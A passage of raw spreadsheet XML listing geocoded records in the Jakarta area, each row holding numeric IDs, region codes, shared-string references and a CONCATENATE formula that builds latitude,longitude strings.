        <v>3174070001</v>
      </c>
      <c r="N1281">
        <v>3174070</v>
      </c>
      <c r="O1281">
        <v>3174</v>
      </c>
      <c r="P1281">
        <v>31</v>
      </c>
      <c r="Q1281" t="s">
        <v>83</v>
      </c>
      <c r="R1281" t="s">
        <v>84</v>
      </c>
      <c r="S1281" t="s">
        <v>32</v>
      </c>
      <c r="T1281" t="s">
        <v>33</v>
      </c>
      <c r="U1281" s="5">
        <v>10672159</v>
      </c>
      <c r="V1281" s="5" t="s">
        <v>15641</v>
      </c>
      <c r="W1281" s="5">
        <v>-616001</v>
      </c>
      <c r="X1281" t="s">
        <v>19417</v>
      </c>
      <c r="Y1281" t="str">
        <f t="shared" si="19"/>
        <v>-6.16001,106.72159</v>
      </c>
    </row>
    <row r="1282" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1282">
        <v>108854</v>
      </c>
      <c r="B1282" s="1">
        <v>43885</v>
      </c>
      <c r="C1282">
        <v>1</v>
      </c>
      <c r="D1282" t="s">
        <v>22</v>
      </c>
      <c r="E1282" t="s">
        <v>23</v>
      </c>
      <c r="F1282" t="s">
        <v>4665</v>
      </c>
      <c r="G1282" t="s">
        <v>4666</v>
      </c>
      <c r="H1282" t="s">
        <v>26</v>
      </c>
      <c r="I1282" t="s">
        <v>908</v>
      </c>
      <c r="J1282" t="s">
        <v>4667</v>
      </c>
      <c r="M1282">
        <v>3172040001</v>
      </c>
      <c r="N1282">
        <v>3172040</v>
      </c>
      <c r="O1282">
        <v>3172</v>
      </c>
      <c r="P1282">
        <v>31</v>
      </c>
      <c r="Q1282" t="s">
        <v>2914</v>
      </c>
      <c r="R1282" t="s">
        <v>281</v>
      </c>
      <c r="S1282" t="s">
        <v>49</v>
      </c>
      <c r="T1282" t="s">
        <v>33</v>
      </c>
      <c r="U1282" s="5">
        <v>10688383</v>
      </c>
      <c r="V1282" s="5" t="s">
        <v>15642</v>
      </c>
      <c r="W1282" s="5">
        <v>-627860</v>
      </c>
      <c r="X1282" t="s">
        <v>19418</v>
      </c>
      <c r="Y1282" t="str">
        <f t="shared" si="19"/>
        <v>-6.27860,106.88383</v>
      </c>
    </row>
    <row r="1283" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1283">
        <v>108855</v>
      </c>
      <c r="B1283" s="1">
        <v>43885</v>
      </c>
      <c r="C1283">
        <v>1</v>
      </c>
      <c r="D1283" t="s">
        <v>22</v>
      </c>
      <c r="E1283" t="s">
        <v>23</v>
      </c>
      <c r="F1283" t="s">
        <v>4668</v>
      </c>
      <c r="G1283" t="s">
        <v>4669</v>
      </c>
      <c r="H1283" t="s">
        <v>26</v>
      </c>
      <c r="I1283" t="s">
        <v>511</v>
      </c>
      <c r="J1283" t="s">
        <v>2627</v>
      </c>
      <c r="M1283">
        <v>3275050003</v>
      </c>
      <c r="N1283">
        <v>3275050</v>
      </c>
      <c r="O1283">
        <v>3275</v>
      </c>
      <c r="P1283">
        <v>32</v>
      </c>
      <c r="Q1283" t="s">
        <v>2310</v>
      </c>
      <c r="R1283" t="s">
        <v>955</v>
      </c>
      <c r="S1283" t="s">
        <v>41</v>
      </c>
      <c r="T1283" t="s">
        <v>42</v>
      </c>
      <c r="U1283" s="5">
        <v>10697854</v>
      </c>
      <c r="V1283" s="5" t="s">
        <v>15643</v>
      </c>
      <c r="W1283" s="5">
        <v>-624870</v>
      </c>
      <c r="X1283" t="s">
        <v>19419</v>
      </c>
      <c r="Y1283" t="str">
        <f t="shared" ref="Y1283:Y1346" si="20">CONCATENATE(X1283,",",V1283)</f>
        <v>-6.24870,106.97854</v>
      </c>
    </row>
    <row r="1284" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1284">
        <v>108856</v>
      </c>
      <c r="B1284" s="1">
        <v>43885</v>
      </c>
      <c r="C1284">
        <v>1</v>
      </c>
      <c r="D1284" t="s">
        <v>22</v>
      </c>
      <c r="E1284" t="s">
        <v>23</v>
      </c>
      <c r="F1284" t="s">
        <v>4670</v>
      </c>
      <c r="G1284" t="s">
        <v>4671</v>
      </c>
      <c r="H1284" t="s">
        <v>26</v>
      </c>
      <c r="I1284" t="s">
        <v>4672</v>
      </c>
      <c r="J1284" t="s">
        <v>2627</v>
      </c>
      <c r="L1284" t="s">
        <v>4673</v>
      </c>
      <c r="M1284">
        <v>3275010011</v>
      </c>
      <c r="N1284">
        <v>3275010</v>
      </c>
      <c r="O1284">
        <v>3275</v>
      </c>
      <c r="P1284">
        <v>32</v>
      </c>
      <c r="Q1284" t="s">
        <v>2389</v>
      </c>
      <c r="R1284" t="s">
        <v>287</v>
      </c>
      <c r="S1284" t="s">
        <v>41</v>
      </c>
      <c r="T1284" t="s">
        <v>42</v>
      </c>
      <c r="U1284" s="5">
        <v>10691330</v>
      </c>
      <c r="V1284" s="5" t="s">
        <v>15644</v>
      </c>
      <c r="W1284" s="5">
        <v>-626193</v>
      </c>
      <c r="X1284" t="s">
        <v>19420</v>
      </c>
      <c r="Y1284" t="str">
        <f t="shared" si="20"/>
        <v>-6.26193,106.91330</v>
      </c>
    </row>
    <row r="1285" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1285">
        <v>108857</v>
      </c>
      <c r="B1285" s="1">
        <v>43885</v>
      </c>
      <c r="C1285">
        <v>1</v>
      </c>
      <c r="D1285" t="s">
        <v>22</v>
      </c>
      <c r="E1285" t="s">
        <v>23</v>
      </c>
      <c r="F1285" t="s">
        <v>4674</v>
      </c>
      <c r="H1285" t="s">
        <v>26</v>
      </c>
      <c r="I1285" t="s">
        <v>511</v>
      </c>
      <c r="J1285" t="s">
        <v>1776</v>
      </c>
      <c r="L1285" t="s">
        <v>4675</v>
      </c>
      <c r="M1285">
        <v>3171090004</v>
      </c>
      <c r="N1285">
        <v>3171090</v>
      </c>
      <c r="O1285">
        <v>3171</v>
      </c>
      <c r="P1285">
        <v>31</v>
      </c>
      <c r="Q1285" t="s">
        <v>1074</v>
      </c>
      <c r="R1285" t="s">
        <v>347</v>
      </c>
      <c r="S1285" t="s">
        <v>108</v>
      </c>
      <c r="T1285" t="s">
        <v>33</v>
      </c>
      <c r="U1285" s="5">
        <v>10685899</v>
      </c>
      <c r="V1285" s="5" t="s">
        <v>15645</v>
      </c>
      <c r="W1285" s="5">
        <v>-622871</v>
      </c>
      <c r="X1285" t="s">
        <v>19421</v>
      </c>
      <c r="Y1285" t="str">
        <f t="shared" si="20"/>
        <v>-6.22871,106.85899</v>
      </c>
    </row>
    <row r="1286" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1286">
        <v>108858</v>
      </c>
      <c r="B1286" s="1">
        <v>43885</v>
      </c>
      <c r="C1286">
        <v>1</v>
      </c>
      <c r="D1286" t="s">
        <v>22</v>
      </c>
      <c r="E1286" t="s">
        <v>23</v>
      </c>
      <c r="F1286" t="s">
        <v>4676</v>
      </c>
      <c r="G1286" t="s">
        <v>4677</v>
      </c>
      <c r="H1286" t="s">
        <v>26</v>
      </c>
      <c r="I1286" t="s">
        <v>4678</v>
      </c>
      <c r="J1286" t="s">
        <v>801</v>
      </c>
      <c r="L1286" t="s">
        <v>4679</v>
      </c>
      <c r="M1286">
        <v>3174010006</v>
      </c>
      <c r="N1286">
        <v>3174010</v>
      </c>
      <c r="O1286">
        <v>3174</v>
      </c>
      <c r="P1286">
        <v>31</v>
      </c>
      <c r="Q1286" t="s">
        <v>268</v>
      </c>
      <c r="R1286" t="s">
        <v>69</v>
      </c>
      <c r="S1286" t="s">
        <v>32</v>
      </c>
      <c r="T1286" t="s">
        <v>33</v>
      </c>
      <c r="U1286" s="5">
        <v>10675898</v>
      </c>
      <c r="V1286" s="5" t="s">
        <v>15646</v>
      </c>
      <c r="W1286" s="5">
        <v>-615939</v>
      </c>
      <c r="X1286" t="s">
        <v>19422</v>
      </c>
      <c r="Y1286" t="str">
        <f t="shared" si="20"/>
        <v>-6.15939,106.75898</v>
      </c>
    </row>
    <row r="1287" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1287">
        <v>108859</v>
      </c>
      <c r="B1287" s="1">
        <v>43885</v>
      </c>
      <c r="C1287">
        <v>1</v>
      </c>
      <c r="D1287" t="s">
        <v>22</v>
      </c>
      <c r="E1287" t="s">
        <v>23</v>
      </c>
      <c r="F1287" t="s">
        <v>4680</v>
      </c>
      <c r="G1287" t="s">
        <v>4681</v>
      </c>
      <c r="H1287" t="s">
        <v>26</v>
      </c>
      <c r="I1287" t="s">
        <v>166</v>
      </c>
      <c r="J1287" t="s">
        <v>4682</v>
      </c>
      <c r="M1287">
        <v>3174040007</v>
      </c>
      <c r="N1287">
        <v>3174040</v>
      </c>
      <c r="O1287">
        <v>3174</v>
      </c>
      <c r="P1287">
        <v>31</v>
      </c>
      <c r="Q1287" t="s">
        <v>389</v>
      </c>
      <c r="R1287" t="s">
        <v>377</v>
      </c>
      <c r="S1287" t="s">
        <v>32</v>
      </c>
      <c r="T1287" t="s">
        <v>33</v>
      </c>
      <c r="U1287" s="5">
        <v>10679016</v>
      </c>
      <c r="V1287" s="5" t="s">
        <v>15647</v>
      </c>
      <c r="W1287" s="5">
        <v>-614786</v>
      </c>
      <c r="X1287" t="s">
        <v>19423</v>
      </c>
      <c r="Y1287" t="str">
        <f t="shared" si="20"/>
        <v>-6.14786,106.79016</v>
      </c>
    </row>
    <row r="1288" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1288">
        <v>108860</v>
      </c>
      <c r="B1288" s="1">
        <v>43885</v>
      </c>
      <c r="C1288">
        <v>1</v>
      </c>
      <c r="D1288" t="s">
        <v>22</v>
      </c>
      <c r="E1288" t="s">
        <v>23</v>
      </c>
      <c r="F1288" t="s">
        <v>4683</v>
      </c>
      <c r="G1288" t="s">
        <v>4684</v>
      </c>
      <c r="H1288" t="s">
        <v>26</v>
      </c>
      <c r="I1288" t="s">
        <v>166</v>
      </c>
      <c r="J1288" t="s">
        <v>4625</v>
      </c>
      <c r="L1288" t="s">
        <v>4685</v>
      </c>
      <c r="M1288">
        <v>3173060006</v>
      </c>
      <c r="N1288">
        <v>3173060</v>
      </c>
      <c r="O1288">
        <v>3173</v>
      </c>
      <c r="P1288">
        <v>31</v>
      </c>
      <c r="Q1288" t="s">
        <v>1587</v>
      </c>
      <c r="R1288" t="s">
        <v>61</v>
      </c>
      <c r="S1288" t="s">
        <v>62</v>
      </c>
      <c r="T1288" t="s">
        <v>33</v>
      </c>
      <c r="U1288" s="5">
        <v>10685475</v>
      </c>
      <c r="V1288" s="5" t="s">
        <v>15648</v>
      </c>
      <c r="W1288" s="5">
        <v>-615555</v>
      </c>
      <c r="X1288" t="s">
        <v>19424</v>
      </c>
      <c r="Y1288" t="str">
        <f t="shared" si="20"/>
        <v>-6.15555,106.85475</v>
      </c>
    </row>
    <row r="1289" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1289">
        <v>108861</v>
      </c>
      <c r="B1289" s="1">
        <v>43885</v>
      </c>
      <c r="C1289">
        <v>1</v>
      </c>
      <c r="D1289" t="s">
        <v>85</v>
      </c>
      <c r="E1289" t="s">
        <v>23</v>
      </c>
      <c r="F1289" t="s">
        <v>4686</v>
      </c>
      <c r="G1289" t="s">
        <v>4687</v>
      </c>
      <c r="H1289" t="s">
        <v>26</v>
      </c>
      <c r="I1289" t="s">
        <v>103</v>
      </c>
      <c r="J1289" t="s">
        <v>4688</v>
      </c>
      <c r="K1289" t="s">
        <v>4689</v>
      </c>
      <c r="L1289" t="s">
        <v>4690</v>
      </c>
      <c r="M1289">
        <v>3171080004</v>
      </c>
      <c r="N1289">
        <v>3171080</v>
      </c>
      <c r="O1289">
        <v>3171</v>
      </c>
      <c r="P1289">
        <v>31</v>
      </c>
      <c r="Q1289" t="s">
        <v>1403</v>
      </c>
      <c r="R1289" t="s">
        <v>1403</v>
      </c>
      <c r="S1289" t="s">
        <v>108</v>
      </c>
      <c r="T1289" t="s">
        <v>33</v>
      </c>
      <c r="U1289" s="5">
        <v>10683796</v>
      </c>
      <c r="V1289" s="5" t="s">
        <v>15649</v>
      </c>
      <c r="W1289" s="5">
        <v>-624168</v>
      </c>
      <c r="X1289" t="s">
        <v>19425</v>
      </c>
      <c r="Y1289" t="str">
        <f t="shared" si="20"/>
        <v>-6.24168,106.83796</v>
      </c>
    </row>
    <row r="1290" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1290">
        <v>108862</v>
      </c>
      <c r="B1290" s="1">
        <v>43885</v>
      </c>
      <c r="C1290">
        <v>1</v>
      </c>
      <c r="D1290" t="s">
        <v>22</v>
      </c>
      <c r="E1290" t="s">
        <v>23</v>
      </c>
      <c r="F1290" t="s">
        <v>4691</v>
      </c>
      <c r="H1290" t="s">
        <v>26</v>
      </c>
      <c r="I1290" t="s">
        <v>3648</v>
      </c>
      <c r="J1290" t="s">
        <v>4692</v>
      </c>
      <c r="L1290" t="s">
        <v>4693</v>
      </c>
      <c r="M1290">
        <v>3174060001</v>
      </c>
      <c r="N1290">
        <v>3174060</v>
      </c>
      <c r="O1290">
        <v>3174</v>
      </c>
      <c r="P1290">
        <v>31</v>
      </c>
      <c r="Q1290" t="s">
        <v>4694</v>
      </c>
      <c r="R1290" t="s">
        <v>1762</v>
      </c>
      <c r="S1290" t="s">
        <v>32</v>
      </c>
      <c r="T1290" t="s">
        <v>33</v>
      </c>
      <c r="U1290" s="5">
        <v>10681222</v>
      </c>
      <c r="V1290" s="5" t="s">
        <v>15650</v>
      </c>
      <c r="W1290" s="5">
        <v>-615745</v>
      </c>
      <c r="X1290" t="s">
        <v>19426</v>
      </c>
      <c r="Y1290" t="str">
        <f t="shared" si="20"/>
        <v>-6.15745,106.81222</v>
      </c>
    </row>
    <row r="1291" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1291">
        <v>108863</v>
      </c>
      <c r="B1291" s="1">
        <v>43885</v>
      </c>
      <c r="C1291">
        <v>1</v>
      </c>
      <c r="D1291" t="s">
        <v>22</v>
      </c>
      <c r="E1291" t="s">
        <v>23</v>
      </c>
      <c r="F1291" t="s">
        <v>4695</v>
      </c>
      <c r="G1291" t="s">
        <v>4696</v>
      </c>
      <c r="H1291" t="s">
        <v>26</v>
      </c>
      <c r="I1291" t="s">
        <v>2073</v>
      </c>
      <c r="J1291" t="s">
        <v>2627</v>
      </c>
      <c r="L1291" t="s">
        <v>4697</v>
      </c>
      <c r="M1291">
        <v>3275010011</v>
      </c>
      <c r="N1291">
        <v>3275010</v>
      </c>
      <c r="O1291">
        <v>3275</v>
      </c>
      <c r="P1291">
        <v>32</v>
      </c>
      <c r="Q1291" t="s">
        <v>2389</v>
      </c>
      <c r="R1291" t="s">
        <v>287</v>
      </c>
      <c r="S1291" t="s">
        <v>41</v>
      </c>
      <c r="T1291" t="s">
        <v>42</v>
      </c>
      <c r="U1291" s="5">
        <v>10691330</v>
      </c>
      <c r="V1291" s="5" t="s">
        <v>15644</v>
      </c>
      <c r="W1291" s="5">
        <v>-626193</v>
      </c>
      <c r="X1291" t="s">
        <v>19420</v>
      </c>
      <c r="Y1291" t="str">
        <f t="shared" si="20"/>
        <v>-6.26193,106.91330</v>
      </c>
    </row>
    <row r="1292" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1292">
        <v>108864</v>
      </c>
      <c r="B1292" s="1">
        <v>43885</v>
      </c>
      <c r="C1292">
        <v>1</v>
      </c>
      <c r="D1292" t="s">
        <v>22</v>
      </c>
      <c r="E1292" t="s">
        <v>23</v>
      </c>
      <c r="F1292" t="s">
        <v>4698</v>
      </c>
      <c r="G1292" t="s">
        <v>4699</v>
      </c>
      <c r="H1292" t="s">
        <v>26</v>
      </c>
      <c r="I1292" t="s">
        <v>2139</v>
      </c>
      <c r="J1292" t="s">
        <v>3515</v>
      </c>
      <c r="L1292" t="s">
        <v>4700</v>
      </c>
      <c r="M1292">
        <v>3172090004</v>
      </c>
      <c r="N1292">
        <v>3172090</v>
      </c>
      <c r="O1292">
        <v>3172</v>
      </c>
      <c r="P1292">
        <v>31</v>
      </c>
      <c r="Q1292" t="s">
        <v>889</v>
      </c>
      <c r="R1292" t="s">
        <v>890</v>
      </c>
      <c r="S1292" t="s">
        <v>49</v>
      </c>
      <c r="T1292" t="s">
        <v>33</v>
      </c>
      <c r="U1292" s="5">
        <v>10690033</v>
      </c>
      <c r="V1292" s="5" t="s">
        <v>15651</v>
      </c>
      <c r="W1292" s="5">
        <v>-620126</v>
      </c>
      <c r="X1292" t="s">
        <v>19427</v>
      </c>
      <c r="Y1292" t="str">
        <f t="shared" si="20"/>
        <v>-6.20126,106.90033</v>
      </c>
    </row>
    <row r="1293" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1293">
        <v>108865</v>
      </c>
      <c r="B1293" s="1">
        <v>43885</v>
      </c>
      <c r="C1293">
        <v>1</v>
      </c>
      <c r="D1293" t="s">
        <v>22</v>
      </c>
      <c r="E1293" t="s">
        <v>23</v>
      </c>
      <c r="F1293" t="s">
        <v>4701</v>
      </c>
      <c r="G1293" t="s">
        <v>4702</v>
      </c>
      <c r="H1293" t="s">
        <v>26</v>
      </c>
      <c r="I1293" t="s">
        <v>72</v>
      </c>
      <c r="J1293" t="s">
        <v>3337</v>
      </c>
      <c r="L1293" t="s">
        <v>4703</v>
      </c>
      <c r="M1293">
        <v>3172070001</v>
      </c>
      <c r="N1293">
        <v>3172070</v>
      </c>
      <c r="O1293">
        <v>3172</v>
      </c>
      <c r="P1293">
        <v>31</v>
      </c>
      <c r="Q1293" t="s">
        <v>127</v>
      </c>
      <c r="R1293" t="s">
        <v>128</v>
      </c>
      <c r="S1293" t="s">
        <v>49</v>
      </c>
      <c r="T1293" t="s">
        <v>33</v>
      </c>
      <c r="U1293" s="5">
        <v>10690258</v>
      </c>
      <c r="V1293" s="5" t="s">
        <v>15652</v>
      </c>
      <c r="W1293" s="5">
        <v>-623451</v>
      </c>
      <c r="X1293" t="s">
        <v>19428</v>
      </c>
      <c r="Y1293" t="str">
        <f t="shared" si="20"/>
        <v>-6.23451,106.90258</v>
      </c>
    </row>
    <row r="1294" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1294">
        <v>108866</v>
      </c>
      <c r="B1294" s="1">
        <v>43885</v>
      </c>
      <c r="C1294">
        <v>1</v>
      </c>
      <c r="D1294" t="s">
        <v>22</v>
      </c>
      <c r="E1294" t="s">
        <v>23</v>
      </c>
      <c r="F1294" t="s">
        <v>4704</v>
      </c>
      <c r="G1294" t="s">
        <v>4705</v>
      </c>
      <c r="H1294" t="s">
        <v>26</v>
      </c>
      <c r="I1294" t="s">
        <v>193</v>
      </c>
      <c r="J1294" t="s">
        <v>4459</v>
      </c>
      <c r="L1294" t="s">
        <v>4706</v>
      </c>
      <c r="M1294">
        <v>3172040003</v>
      </c>
      <c r="N1294">
        <v>3172040</v>
      </c>
      <c r="O1294">
        <v>3172</v>
      </c>
      <c r="P1294">
        <v>31</v>
      </c>
      <c r="Q1294" t="s">
        <v>552</v>
      </c>
      <c r="R1294" t="s">
        <v>281</v>
      </c>
      <c r="S1294" t="s">
        <v>49</v>
      </c>
      <c r="T1294" t="s">
        <v>33</v>
      </c>
      <c r="U1294" s="5">
        <v>10688147</v>
      </c>
      <c r="V1294" s="5" t="s">
        <v>15653</v>
      </c>
      <c r="W1294" s="5">
        <v>-625298</v>
      </c>
      <c r="X1294" t="s">
        <v>19429</v>
      </c>
      <c r="Y1294" t="str">
        <f t="shared" si="20"/>
        <v>-6.25298,106.88147</v>
      </c>
    </row>
    <row r="1295" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1295">
        <v>108867</v>
      </c>
      <c r="B1295" s="1">
        <v>43885</v>
      </c>
      <c r="C1295">
        <v>1</v>
      </c>
      <c r="D1295" t="s">
        <v>22</v>
      </c>
      <c r="E1295" t="s">
        <v>23</v>
      </c>
      <c r="F1295" t="s">
        <v>4707</v>
      </c>
      <c r="G1295" t="s">
        <v>4708</v>
      </c>
      <c r="H1295" t="s">
        <v>26</v>
      </c>
      <c r="I1295" t="s">
        <v>4595</v>
      </c>
      <c r="J1295" t="s">
        <v>2747</v>
      </c>
      <c r="L1295" t="s">
        <v>4709</v>
      </c>
      <c r="M1295">
        <v>3172090005</v>
      </c>
      <c r="N1295">
        <v>3172090</v>
      </c>
      <c r="O1295">
        <v>3172</v>
      </c>
      <c r="P1295">
        <v>31</v>
      </c>
      <c r="Q1295" t="s">
        <v>2749</v>
      </c>
      <c r="R1295" t="s">
        <v>890</v>
      </c>
      <c r="S1295" t="s">
        <v>49</v>
      </c>
      <c r="T1295" t="s">
        <v>33</v>
      </c>
      <c r="U1295" s="5">
        <v>10688200</v>
      </c>
      <c r="V1295" s="5" t="s">
        <v>15654</v>
      </c>
      <c r="W1295" s="5">
        <v>-619328</v>
      </c>
      <c r="X1295" t="s">
        <v>19430</v>
      </c>
      <c r="Y1295" t="str">
        <f t="shared" si="20"/>
        <v>-6.19328,106.88200</v>
      </c>
    </row>
    <row r="1296" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1296">
        <v>108868</v>
      </c>
      <c r="B1296" s="1">
        <v>43885</v>
      </c>
      <c r="C1296">
        <v>1</v>
      </c>
      <c r="D1296" t="s">
        <v>22</v>
      </c>
      <c r="E1296" t="s">
        <v>23</v>
      </c>
      <c r="F1296" t="s">
        <v>4710</v>
      </c>
      <c r="H1296" t="s">
        <v>26</v>
      </c>
      <c r="I1296" t="s">
        <v>1359</v>
      </c>
      <c r="J1296" t="s">
        <v>4711</v>
      </c>
      <c r="L1296" t="s">
        <v>4712</v>
      </c>
      <c r="M1296">
        <v>3173060004</v>
      </c>
      <c r="N1296">
        <v>3173060</v>
      </c>
      <c r="O1296">
        <v>3173</v>
      </c>
      <c r="P1296">
        <v>31</v>
      </c>
      <c r="Q1296" t="s">
        <v>4713</v>
      </c>
      <c r="R1296" t="s">
        <v>61</v>
      </c>
      <c r="S1296" t="s">
        <v>62</v>
      </c>
      <c r="T1296" t="s">
        <v>33</v>
      </c>
      <c r="U1296" s="5">
        <v>10686191</v>
      </c>
      <c r="V1296" s="5" t="s">
        <v>15655</v>
      </c>
      <c r="W1296" s="5">
        <v>-615909</v>
      </c>
      <c r="X1296" t="s">
        <v>19431</v>
      </c>
      <c r="Y1296" t="str">
        <f t="shared" si="20"/>
        <v>-6.15909,106.86191</v>
      </c>
    </row>
    <row r="1297" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1297">
        <v>108869</v>
      </c>
      <c r="B1297" s="1">
        <v>43885</v>
      </c>
      <c r="C1297">
        <v>1</v>
      </c>
      <c r="D1297" t="s">
        <v>22</v>
      </c>
      <c r="E1297" t="s">
        <v>23</v>
      </c>
      <c r="F1297" t="s">
        <v>4714</v>
      </c>
      <c r="G1297" t="s">
        <v>4715</v>
      </c>
      <c r="H1297" t="s">
        <v>26</v>
      </c>
      <c r="I1297" t="s">
        <v>111</v>
      </c>
      <c r="J1297" t="s">
        <v>2627</v>
      </c>
      <c r="L1297" t="s">
        <v>4716</v>
      </c>
      <c r="M1297">
        <v>3275050003</v>
      </c>
      <c r="N1297">
        <v>3275050</v>
      </c>
      <c r="O1297">
        <v>3275</v>
      </c>
      <c r="P1297">
        <v>32</v>
      </c>
      <c r="Q1297" t="s">
        <v>2310</v>
      </c>
      <c r="R1297" t="s">
        <v>955</v>
      </c>
      <c r="S1297" t="s">
        <v>41</v>
      </c>
      <c r="T1297" t="s">
        <v>42</v>
      </c>
      <c r="U1297" s="5">
        <v>10697307</v>
      </c>
      <c r="V1297" s="5" t="s">
        <v>15656</v>
      </c>
      <c r="W1297" s="5">
        <v>-626356</v>
      </c>
      <c r="X1297" t="s">
        <v>19432</v>
      </c>
      <c r="Y1297" t="str">
        <f t="shared" si="20"/>
        <v>-6.26356,106.97307</v>
      </c>
    </row>
    <row r="1298" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1298">
        <v>108870</v>
      </c>
      <c r="B1298" s="1">
        <v>43885</v>
      </c>
      <c r="C1298">
        <v>1</v>
      </c>
      <c r="D1298" t="s">
        <v>22</v>
      </c>
      <c r="E1298" t="s">
        <v>23</v>
      </c>
      <c r="F1298" s="3" t="s">
        <v>4717</v>
      </c>
      <c r="G1298" t="s">
        <v>4718</v>
      </c>
      <c r="H1298" t="s">
        <v>26</v>
      </c>
      <c r="I1298" t="s">
        <v>193</v>
      </c>
      <c r="J1298" t="s">
        <v>4719</v>
      </c>
      <c r="L1298" t="s">
        <v>4720</v>
      </c>
      <c r="M1298">
        <v>3172040004</v>
      </c>
      <c r="N1298">
        <v>3172040</v>
      </c>
      <c r="O1298">
        <v>3172</v>
      </c>
      <c r="P1298">
        <v>31</v>
      </c>
      <c r="Q1298" t="s">
        <v>280</v>
      </c>
      <c r="R1298" t="s">
        <v>281</v>
      </c>
      <c r="S1298" t="s">
        <v>49</v>
      </c>
      <c r="T1298" t="s">
        <v>33</v>
      </c>
      <c r="U1298" s="5">
        <v>10688417</v>
      </c>
      <c r="V1298" s="5" t="s">
        <v>15657</v>
      </c>
      <c r="W1298" s="5">
        <v>-625637</v>
      </c>
      <c r="X1298" t="s">
        <v>19433</v>
      </c>
      <c r="Y1298" t="str">
        <f t="shared" si="20"/>
        <v>-6.25637,106.88417</v>
      </c>
    </row>
    <row r="1299" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1299">
        <v>108871</v>
      </c>
      <c r="B1299" s="1">
        <v>43885</v>
      </c>
      <c r="C1299">
        <v>1</v>
      </c>
      <c r="D1299" t="s">
        <v>22</v>
      </c>
      <c r="E1299" t="s">
        <v>23</v>
      </c>
      <c r="F1299" t="s">
        <v>4721</v>
      </c>
      <c r="G1299" t="s">
        <v>4722</v>
      </c>
      <c r="H1299" t="s">
        <v>26</v>
      </c>
      <c r="I1299" t="s">
        <v>4723</v>
      </c>
      <c r="J1299" t="s">
        <v>2722</v>
      </c>
      <c r="L1299" t="s">
        <v>4724</v>
      </c>
      <c r="M1299">
        <v>3173010003</v>
      </c>
      <c r="N1299">
        <v>3173010</v>
      </c>
      <c r="O1299">
        <v>3173</v>
      </c>
      <c r="P1299">
        <v>31</v>
      </c>
      <c r="Q1299" t="s">
        <v>2338</v>
      </c>
      <c r="R1299" t="s">
        <v>1481</v>
      </c>
      <c r="S1299" t="s">
        <v>62</v>
      </c>
      <c r="T1299" t="s">
        <v>33</v>
      </c>
      <c r="U1299" s="5">
        <v>10681065</v>
      </c>
      <c r="V1299" s="5" t="s">
        <v>15658</v>
      </c>
      <c r="W1299" s="5">
        <v>-620545</v>
      </c>
      <c r="X1299" t="s">
        <v>19434</v>
      </c>
      <c r="Y1299" t="str">
        <f t="shared" si="20"/>
        <v>-6.20545,106.81065</v>
      </c>
    </row>
    <row r="1300" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1300">
        <v>108872</v>
      </c>
      <c r="B1300" s="1">
        <v>43885</v>
      </c>
      <c r="C1300">
        <v>1</v>
      </c>
      <c r="D1300" t="s">
        <v>22</v>
      </c>
      <c r="E1300" t="s">
        <v>23</v>
      </c>
      <c r="F1300" t="s">
        <v>4725</v>
      </c>
      <c r="G1300" t="s">
        <v>4726</v>
      </c>
      <c r="H1300" t="s">
        <v>26</v>
      </c>
      <c r="I1300" t="s">
        <v>1633</v>
      </c>
      <c r="J1300" t="s">
        <v>4727</v>
      </c>
      <c r="L1300" t="s">
        <v>4728</v>
      </c>
      <c r="M1300">
        <v>3171080001</v>
      </c>
      <c r="N1300">
        <v>3171080</v>
      </c>
      <c r="O1300">
        <v>3171</v>
      </c>
      <c r="P1300">
        <v>31</v>
      </c>
      <c r="Q1300" t="s">
        <v>2265</v>
      </c>
      <c r="R1300" t="s">
        <v>1403</v>
      </c>
      <c r="S1300" t="s">
        <v>108</v>
      </c>
      <c r="T1300" t="s">
        <v>33</v>
      </c>
      <c r="U1300" s="5">
        <v>10684548</v>
      </c>
      <c r="V1300" s="5" t="s">
        <v>15659</v>
      </c>
      <c r="W1300" s="5">
        <v>-626245</v>
      </c>
      <c r="X1300" t="s">
        <v>19435</v>
      </c>
      <c r="Y1300" t="str">
        <f t="shared" si="20"/>
        <v>-6.26245,106.84548</v>
      </c>
    </row>
    <row r="1301" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1301">
        <v>108873</v>
      </c>
      <c r="B1301" s="1">
        <v>43885</v>
      </c>
      <c r="C1301">
        <v>1</v>
      </c>
      <c r="D1301" t="s">
        <v>22</v>
      </c>
      <c r="E1301" t="s">
        <v>23</v>
      </c>
      <c r="F1301" t="s">
        <v>4729</v>
      </c>
      <c r="G1301" t="s">
        <v>4730</v>
      </c>
      <c r="H1301" t="s">
        <v>26</v>
      </c>
      <c r="I1301" t="s">
        <v>3937</v>
      </c>
      <c r="J1301" t="s">
        <v>4731</v>
      </c>
      <c r="M1301">
        <v>3175010005</v>
      </c>
      <c r="N1301">
        <v>3175010</v>
      </c>
      <c r="O1301">
        <v>3175</v>
      </c>
      <c r="P1301">
        <v>31</v>
      </c>
      <c r="Q1301" t="s">
        <v>1686</v>
      </c>
      <c r="R1301" t="s">
        <v>546</v>
      </c>
      <c r="S1301" t="s">
        <v>547</v>
      </c>
      <c r="T1301" t="s">
        <v>33</v>
      </c>
      <c r="U1301" s="5">
        <v>10677101</v>
      </c>
      <c r="V1301" s="5" t="s">
        <v>15660</v>
      </c>
      <c r="W1301" s="5">
        <v>-611470</v>
      </c>
      <c r="X1301" t="s">
        <v>19436</v>
      </c>
      <c r="Y1301" t="str">
        <f t="shared" si="20"/>
        <v>-6.11470,106.77101</v>
      </c>
    </row>
    <row r="1302" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1302">
        <v>108874</v>
      </c>
      <c r="B1302" s="1">
        <v>43885</v>
      </c>
